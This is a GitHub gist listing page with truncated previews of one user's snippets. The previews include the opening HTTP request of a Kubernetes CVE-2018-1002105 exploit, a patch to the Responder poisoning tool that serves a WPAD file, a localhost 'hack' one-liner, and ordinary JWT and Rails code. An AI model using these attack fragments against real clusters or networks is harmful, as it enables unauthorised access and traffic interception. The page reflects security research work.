abhisek
/ gist:3ef7f1e208d46771cb79b6440028b787
Created
December 7, 2018 18:14
Kubernetes Exploit CVE-2018–1002105
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GET /api/v1/namespaces/mynamespace/pods/cool-79b76569d9-wxsvs/exec HTTP/1.1 | |
| Authorization: Bearer $TOKEN | |
| Host: 192.168.12.10:6443 | |
| Connection: upgrade | |
| Upgrade: websocket |
abhisek
/ responder-wpad-file-patch
Created
June 19, 2018 05:45
Responder patch to serve wpad.dat from file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git a/Responder.conf b/Responder.conf | |
| index 4303df6..0d32158 100644 | |
| --- a/Responder.conf | |
| +++ b/Responder.conf | |
| @@ -78,6 +78,8 @@ ExeDownloadName = ProxyClient.exe | |
| ; Custom WPAD Script | |
| WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';} | |
| +WPADScriptFile = /tmp/wpad3.dat | |
| + |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'rubygems' | |
| require 'bundler' | |
| Bundler.require(:default) | |
| require 'nokogiri' | |
| require 'uri' | |
| require 'set' | |
| BASE_URL = 'http://127.0.0.1:8000/' |
abhisek
/ sol-hack-oneliner.rb
Created
September 17, 2017 11:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ruby -r json -r "net/http" -e "puts JSON.parse(Net::HTTP.get_response(URI.parse('http://127.0.0.1:8000/graph.json')).body).map {|e| e[1]['codes']}.flatten.sort.first" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM node:slim | |
| RUN mkdir /app | |
| ADD . /app | |
| WORKDIR /app | |
| RUN npm install | |
| EXPOSE 8000 | |
| CMD npm start |
abhisek
/ apigw_api.rb
Created
April 26, 2017 17:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| get '/info' do | |
| @data_service.info.to_json | |
| end |
abhisek
/ apigw_sinatra.rb
Created
April 26, 2017 17:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def decode_jwt(id_token) | |
| id_token = id_token.slice(7 .. -1) if id_token =~ /^Bearer/i | |
| JWT.decode id_token, ENV['AUTH0_CLIENT_SECRET'], true, | |
| algorithm: ENV['AUTH0_JWT_ALGO'], verify_iss: true, | |
| aud: ENV['AUTH0_CLIENT_ID'], | |
| verify_aud: true | |
| end | |
| before do |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class DataServiceClient | |
| def initialize(customer_id) | |
| raise "Invalid Customer Id" if customer_id.to_i.zero? | |
| @customer_id = customer_id.to_i | |
| @client = RestClient::Resource.new(ENV['DATA_API_URL'] + '/customers/' + @customer_id.to_s, | |
| :headers => { 'X-Access-Token' => ENV['DATA_API_KEY'], 'Accept' => 'application/json' }) | |
| end | |
| def info |
abhisek
/ nodejs-express-jwt.js
Created
April 24, 2017 06:49
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var jwt = require('express-jwt'); | |
| var JwtTokenValidator = { | |
| validateToken: function(req, res, next) { | |
| if(req.user) { | |
| next(); | |
| } else { | |
| res.status(401).json({ error: 'JwtMissingOrIncorrect', message: 'JWT token is missing or incorrect.' }); | |
| } | |
| } | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class Api::V1::ProjectsController < Api::V1::ApiController | |
| before_filter :authenticate_api_user! | |
| before_filter :load_customer! | |
| def index | |
| @projects = @customer.projects.order('created_at DESC') | |
| render :json => @projects, :except => project_exclusions, | |
| :methods => project_inclusions |